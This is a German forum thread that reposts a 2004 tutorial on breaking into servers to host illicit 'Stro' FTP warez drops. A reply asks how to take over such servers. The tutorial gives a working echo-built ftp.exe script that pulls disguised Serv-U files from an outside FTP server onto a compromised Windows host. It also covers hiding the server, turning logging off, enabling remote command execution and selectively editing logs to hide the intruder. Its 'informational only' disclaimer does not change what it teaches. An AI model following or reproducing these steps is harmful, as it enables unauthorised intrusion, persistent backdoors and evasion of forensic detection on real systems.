#1 16. August 2004 nach Stundenlanger Suche für dieses Tut habe ich es gefunden : INFO: Dieses Dokument dient rein informativen und zu Lernzwecken. Es wird ausdrücklich darauf hingewiesen, dass das widerrechtliche Eindringen in fremde PCs oder Netzwerke illegal ist. Ich habe mich entschlossen ein kleines TUT über das Hax0rn zu schreiben. Genauer gesagt übers Strohacking. Damit keine Enttäuschung aufkommt muss ich allerdings vorher sagen, daß ich das TUT sehr allgemein halte. Es ist keine Schritt für Schritt Anleitung und bezieht sich nicht auf das exploiten einer bestimmten Sicherheitslücke. Mit etwas Gehirnleistung und Google allerdings sollte man in der Lage sein, sich den Rest selbst zu erschliessen. Wenn man so vorgeht (selberdenken statt abtippen) ist sichergestellt, daß man versteht was man gerade tut und daher auch weiss, worauf man achten sollte. Also los! Abschnitte 1) "Stros hacken" worum gehts? 2) "Stros hacken" wie gehts? ******************* *****))) 1 (((***** - Worum gehts, was ist das Ziel? ******************* Stros kennt ihr. Ihr wisst, daß sie anders sind als normale Pubs. Man kann fast immer davon flashen. Man hat einen Benutzernamen und Passwort und einen anderen Port als 21 (in der Regel). Und das alles ist so, weil sie von jemandem "gehax0red" wurden. So weit so gut. Aber was genau wird wie gehax0red? Was muss ich tun, damit ein beliebiger Server hinterher einen FTP-Zugang mit massig tollen Sachen bereit hält? Nun, das ist alles schnell erklärt: Der Hax0r verschafft sich über eine Sicherheitslücke Zugang zum entfernten Rechner und richtet dort einen FTP-Server ein. Das ist schon alles. ******************* *****))) 2 (((***** - Und wie geht das? ******************* Um diese Frage zu beantworten muss man nun schon etwas weiter ausholen *g* Also es ist bekannterweise so, daß es in nahezu jeder Software kleinere oder größere Programmierfehler gibt. Manche wirken sich als harmlose Bugs aus, indem sie den User mit schwachsinnigem bis ärgerlichem Fehlverhalten entnerven (zum Nachvollziehen nehme man eine beliebige Windows CD und installiere sie auf seinem PC. Danach nur noch starten und zuschauen ;o) ). Manche Fehler können jedoch zu ausgewachsenen Sicherheitslücken führen, die so weit gehen können, daß fremde vollen Zugriff auf das sich auf dem Server befindliche Betriebssystem erhalten können. Solche Sicherheitslücken werden auf einschlägigen Security-Sites und Mailinglists diskutiert. Ich muss mich also über Sicherheitslücken in populärer Serversoftware informieren. Dabei fallen dann einem gleich Kandidaten wie IIS, SQL oder auch Apache-Server ins Auge. Nachdem man sich darüber informiert hat, wie man sich die Sicherheitslücke in einer bestimmten Software zu Nutze macht, sollte man in der Lage sein, Befehle von der cmd.exe (bei Windows Systemen) ausführen zu lassen, was nichts anderes ist als die Konsole bzw. MS-Dos-Eingabeaufforderung. ich hoffe ihr denkt immer an eure Sicherheit und kümmert euch um proxys bevor ihr euch mit dem Zielrechner verbindet. Ihr könnt also ohne Probleme einen FTP-Server auf dem Server installieren. Oder nicht? Erstmal muss sich dort natürlich auch einer befinden. Oft ist schon einer da: Der vom IIS. Denn könnten wir mit dem net start Befehl starten. Allerdings empfiehlt sich das nicht. Wir wollen ja die volle Kontrolle haben. Also sollten wir zusehen, daß wir irgendwie einen ordentlichen FTP-Server auf den Zielrechner zu bekommen. Hierzu empfiehlt sich Serv-U besonders. Es sind nur wenig Files, die man auf den Zielrechner schicken muss und man kann ihn gut tarnen indem man die Files z.B. umbenennt. Es empfiehlt sich auch, Serv-U erst einmal auf dem eigenen Rechner zu installieren und ordentlich zu konfigurieren, damit man eine fertige .ini Datei hat. Hinterher braucht man nurnoch die Dateien servudaemon.exe und servudaemon.ini und (je nach Version) vielleicht noch die TzoLibr.dll. Man kann auch noch eigene Textfiles anfertigen, die beim Einloggen und Verzeichniswechseln angezeigt werden. Hinterher kann man Serv-U bequem per Remote Admin Tool fernbedienen. WICHTIG: Das Logging sollte bei Serv-U unbedingt ausgeschaltet sein (ist standardmäßig so). Um die Files auf den Zielrechner zu bekommen haben wir 2 brauchbare Möglichkeiten: 1. TFTP Server auf dem eigenen PC installieren und die Files per TFTP holen. Nach Möglichkeit sollte man auf diese Methode jedoch verzichten, da man dann seine eigene IP-Adresse angeben muss. 2. Die Files auf einem FTP-Server zwischenlagern und von dort auf den Zielrechner downloaden. Auf diese Methode will ich hier näher eingehen, genauer gesagt auf die Echo-Methode. Bei der Echo-Methode legt man eine kleine .txt-Datei an, die ein Script für ftp.exe darstellt. So kann man sich mit ftp.exe mit nur einer Zeile zu dem FTP-Server verbinden und alle Files downloaden. Die .txt-Datei legt man mit Hilfe des echo-Befehls an. Dazu gibt man nacheinander folgende Zeilen ein: echo open [FTP-SERVER] > c:\winnt\system32\file.txt echo user [BENUTZERNAME] [PASSWORT] >> c:\winnt\system32\file.txt echo binary >> c:\winnt\system32\file.txt echo lcd c:\[ZIELPFAD] >> c:\winnt\system32\file.txt echo cd "[PFAD MIT SERV-U FILES AUF FTP]" >> c:\winnt\system32\file.txt echo get servudaemon.ini >> c:\winnt\system32\file.txt echo get servudaemon.exe >> c:\winnt\system32\file.txt echo quit >> c:\winnt\system32\file.txt Danach stehen die obigen Zeilen nun genau so aber ohne "echo" am Anfang in c:\winnt\system32\file.txt . Nun startet man ftp.exe und läasst es das Script abarbeiten: ftp -n -v -s:c:\winnt\system32\file.txt ftp.exe startet nun und führt jeden Befehl nacheinander aus, wodurch alles ein paar Minuten hängen kann, bis die Files downgeloaded sind. Dann muss man nur noch die servudameon.exe ausführen, um den Server zu starten und sollte sich dann mit dem eingestellten Benutzernamen, Passwort und Port per FTP-Client verbinden können. Man sollte bei seinem eigenen Axx File Execute erlauben (kann man im Admin Tool einstellen) und kann dann Befehler über den FTP-Clienten ausführen (RAW COMMAND -> "site exec <befehl>"). Das wird dann nicht mitgeloggt. - Wo wir beim nächsten Thema wären: Den Logfiles. Nachdem euer FTP-Server läuft, solltet ihr die HDD direkt mal nach Logdateien durchsuchen. Die relevanten Dateien findet ihr an verschiedenen Stellen, je nachdem, wo das Programm über das ihr euch mit dem Server verbunden habt (SQL, IIS etc.) seine Logfiles ablegt. Ihr sollten die Logdateien jedoch nicht komplett löschen, das ist recht auffällig. Bearbeitet sie und entfernt nur alle Einträge die auf euch hinweisen. Das war auch eigentlich schon alles, was ich zu dem Thema sagen will. Ich hoffe, ich habe einigen Leuten etwas auf die Sprünge geholfen. ================================================================================== ================================================================================== Erstellt von zinion Heruntergeladen von http://fxpcenter.inet-e.de Darf ohne Einschränkungen verteilt und verbreitet werden, darf dabei aber nicht verändert werden und muss diese Bemerkung enthalten. ================================================================================== Ihr dürft euch bedanken .. Für meine Stundenlange und harte Arbeit ! Mfg Ricken
#2 29. Juli 2005 Also ich versuche schon seit längerem zu lernen wie man stros deren daten ich habe und auch mühelos per ftp clienten rein komme zu hacken... Also die daten(usernamen&passwort) zu ändern. ich habe mehrere stros die seit über einem jahr nicht benutzt wurden und anscheinend gut gesichert sind da sie nicht gelöscht werden ich habe im forum schon viel gesucht...aber nichts wirkliches gefunden und die tutorials sind ja meistens gut geschrieben aber ich glauube ich bin zu dumm^^ wenn mir jemand hilft danke im vorraus!! mfg